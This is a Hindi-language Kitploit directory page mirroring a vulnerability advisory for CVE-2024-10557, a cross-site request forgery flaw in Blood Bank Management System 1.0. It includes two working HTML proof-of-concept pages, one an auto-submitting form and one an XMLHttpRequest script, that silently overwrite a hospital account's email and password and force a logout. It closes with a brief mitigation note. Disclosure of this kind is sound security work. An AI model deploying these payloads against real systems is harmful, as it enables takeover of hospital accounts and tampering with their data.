Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10557 — एक अस्पताल के प्रोफाइल को अपडेट करने के लिए CSRF POC जो खाता अधिग्रहण की ओर ले जाता है | Kitploit
उपकरण/GitHubGitHub/bevennyamande/cve-2024-10557
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbevennyamande/cve-2024-10557

CVE-2024-10557

एक अस्पताल के प्रोफाइल को अपडेट करने के लिए CSRF POC जो खाता अधिग्रहण की ओर ले जाता है

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रभावित संस्करण:

  • ब्लडबैंक प्रबंधन प्रणाली: 1.0

भेद्यता जानकारी:

  • भेद्यता प्रकार: क्रॉस साइट रिक्वेस्ट फोर्जरी (CSRF)
  • गंभीरता: उच्च
  • स्थिति: अनपैच्ड

भेद्य एंडपॉइंट:

  • पथ: /file/updateprofile.php

भेद्यता विवरण:

इस एंडपॉइंट /file/updateprofile.php पर एक CSRF भेद्यता है जो एक दूरस्थ उपयोगकर्ता को अस्पताल के उपयोगकर्ता विवरण अपडेट करने की अनुमति देती है और खाता अधिग्रहण का कारण बन सकती है क्योंकि हमलावर ईमेल से लेकर पासवर्ड तक सभी जानकारी अपडेट कर सकता है, जिससे खाता अधिग्रहण की संभावना प्रभावी रूप से बढ़ जाती है।

सफल शोषण पीड़ित की ओर से अनधिकृत कार्यों यानी डेटा हटाने का कारण बन सकता है। इसके अतिरिक्त, पेलोड के साथ दुर्भावनापूर्ण वेबसाइटों पर जाकर इसका शोषण किया जा सकता है।


प्रूफ ऑफ कॉन्सेप्ट (PoC):

नीचे एक CSRF POC हमले का उदाहरण दिया गया है जो लॉग इन किए गए अस्पताल खाते के प्रोफ़ाइल विवरण अपडेट करता है, फ़ाइल को हमलावर-नियंत्रित डोमेन पर होस्ट करें, मेरे मामले में मैं localhost का उपयोग कर रहा था:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC with Logout Redirect</title>
</head>
<body>
    <h2>CSRF Proof of Concept with Chained Logout</h2>

    <!-- Form to exploit CSRF vulnerability for updating profile -->
    <form id="csrfForm" action="http://localhost.local/bloodbank/file/updateprofile.php" method="POST">
        <input type="hidden" name="hname" value="parirenyatwa">
        <input type="hidden" name="hemail" value="[email protected]">
        <input type="hidden" name="hpassword" value="pari1234">
        <input type="hidden" name="hphone" value="0777054000">
        <input type="hidden" name="hcity" value="harare">
        <input type="hidden" name="update" value="Update">
    </form>

    <script>
        // Submit the CSRF form to update profile
        document.getElementById("csrfForm").submit();
   </script>
</body>
</html>



खाता अधिग्रहण के लिए प्रूफ ऑफ कॉन्सेप्ट (POC)

  • हमलावर ईमेल और पासवर्ड में हेरफेर करके प्रोफ़ाइल विवरण को प्रभावी ढंग से अपडेट कर सकता है और लॉगआउट CSRF को मजबूर कर सकता है जिससे खाता अधिग्रहण प्राप्त होता है।
root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC with XMLHttpRequest</title>
</head>
<body>
    <h2>CSRF Proof of Concept with XMLHttpRequest and Redirect</h2>

    <script>
        // Define the target URLs for the CSRF attack
        const updateUrl = "http://localhost.local/bloodbank/file/updateprofile.php";
        const logoutUrl = "http://localhost.local/bloodbank/logout.php";

        // Data for the profile update CSRF request
        const updateData = "hname=parirenyatwa&hemail=pari%40hospital.co.zw&hpassword=pari1234&hphone=0777054000&hcity=harare&update=Update";

        // Function to send the XMLHttpRequest
        function sendCSRFUpdate() {
            const xhr = new XMLHttpRequest();
            xhr.open("POST", updateUrl, true);
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

            // When the request is complete, redirect to the logout page
            xhr.onload = function() {
                if (xhr.status === 200) {
                    console.log("Profile update CSRF request completed");
                    // Redirect to logout URL to log the victim out
                    window.location.href = logoutUrl;
                } else {
                    console.error("Profile update failed with status:", xhr.status);
                }
            };

            // Send the request with the update data
            xhr.send(updateData);
        }

        // Trigger the CSRF attack by sending the update request
        sendCSRFUpdate();
    </script>
</body>
</html>




प्रभाव:

  • डेटा हेरफेर: हमलावर उपयोगकर्ताओं को दिखाई गई सामग्री को संशोधित कर सकते हैं।
  • प्रतिष्ठा को नुकसान: दुर्भावनापूर्ण व्यवहार के कारण उपयोगकर्ता सिस्टम पर विश्वास खो सकते हैं।

शमन अनुशंसाएँ:

  1. CSRF टोकन का उपयोग करें क्रॉस-डोमेन एक्सेस को रोकने के लिए तंत्र लागू करें या अपने अनुरोध में csrf टोकन डालें और साथ ही GET अनुरोधों को स्थिति-बदलने वाली कार्रवाई करने से बचें।
टूल डाउनलोड करें